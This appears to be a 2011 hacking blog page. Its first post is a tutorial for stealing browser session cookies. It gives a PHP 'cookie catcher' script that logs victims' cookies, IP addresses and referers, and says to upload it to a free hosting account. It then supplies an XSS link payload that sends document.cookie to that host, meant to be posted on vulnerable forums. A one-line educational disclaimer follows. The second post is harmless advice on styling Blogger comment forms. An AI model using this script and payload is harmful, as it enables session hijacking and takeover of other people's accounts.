Saturday, November 19, 2011

What is Cookie Catcher and How to Get Cookies Using it

Hello guys , hope you all are enjoying good health. the day before yesterday I have completed my tutorial on XSS in which we checked Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent  Method In those tutorials I have told that we have to use cookie catcher tool to get the cookies in our online free php hosting account . After that I got a lot of questions about Cookie Catcher like what is it etc.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments.

What is Cookie ?

  • First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
  • Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
  • This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a cookie catcher?

  • A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
  • Hacker usually sends you a code or link and this link is connected to the cookie catcher.
  • When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.

Is making a cookie catcher hard ?

  • Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
  • The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
  • In fact the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher ?

  • Copy the below code in a notepad :
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>
  • Save this notepad as CookieCatcher.php
  • Hurrah !!! You have created a cookie catcher.

 How to Use Cookie Catcher ?

  • Now the question arises how can we use a cookie catcher.
  • First of all create a free account on 0fees.net
  • After creating account open cpanel.0fees.net and log in to your account.
  • Now under File Management , click on Online File Manager .
  • Now open htdocs and upload the CookieCatcher.php file in it.
  • Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
  • Make sure to change user username .
  • After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.
NOTE : This tutorial is only for Educational purposes and HWS team is not responsible for any kind of mis use of it .

Friday, November 18, 2011

Chapter 5 : Give Your Comment Form a Professional Look

Hello guys ,hope you all are fine and enjoying good health .First thing I was busy that's why posting this chapter so late. In our previous posts we have learn about How to Make your Blog Post Attractive and then we checked Widgets and Add-ons essential for blogger . After these two posts we are now done with the template as we have customized both the posts and the widgets. Now the only remaining part on the blog is Comment portion. So in this chapter we will learn how to customized a comment system which is actually very important as the visitors usually judge the popularity of a post with its number of comments.

Blogger Comment System

Blogger Comment System is very poor as compared to wordpress or joomla.If you check comment system of wordpress then u will really say that its looking a professional site but in case of blogger its just a simple notepad type and today in this chapter we will try to make it as best as we can.Follow the bellow steps to customize it.

a) Customize Blogger Comment form :

  • First of all follow this tutorial step by step to Customize Blogger Comment Form & Make It Attractive  
  • Now the most important thing choose that comment form style which is similar to your blog style.
  • Like in our blog HWS you have seen that the comment border color is as same as the color of headings or the color of links.
  • But the problem is how to change the color of borders etc to make it similar to your blog color, for this I have completely mentioned in above tutorial which color is doing what and with the help of  this tool HTML Color Code Generator you can easily get your desired color.
  • You have also seen that comment system on HWS gives a professional look so just follow this tutorial and make your comment system as same as mine .

b) Change Author Comment Color :

  • Next thing is author's comment , dont you think that author's comments must be different from the visitor comments.
  • When a new visitor comes to your post and he finds something difficult he immediately moves to the comments to check whether someone else asks about it or not and when he can easily see the admin's comment then it will be a relief for him as now he doesn't need to read all the comments ,he just read the author's comment to find solution to his problem.
  • Now how can you change the authors comment style.Read this tutorial and Change Author Comments Color Style In Blogger quite easily.
  • You can also make changes to this code . Just play with the code and get your desired color for author's comment with the help of  HTML Color Code Generator 
  • But again the same thing try to maintain the flow of your blog , as in HWS the author's comment color is again sky blue .... :))
  • I know these are very minor things but these minor things bring a great impact. Trust me ......

c) Add a note above

d) Add a reply button

 That's it for today but I have missed one thing here which is how to add a reply button on each comment ,I will post about it soon and then will add it to this chapter. Your feedback is really important so that I may write the next chapter ...... Take care :))

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

700+ Followers

Followers


meet women in Ukraine contatore visite website counter
DMCA.com

Recent Comments

Follow Me On Twitter

1112+ Followers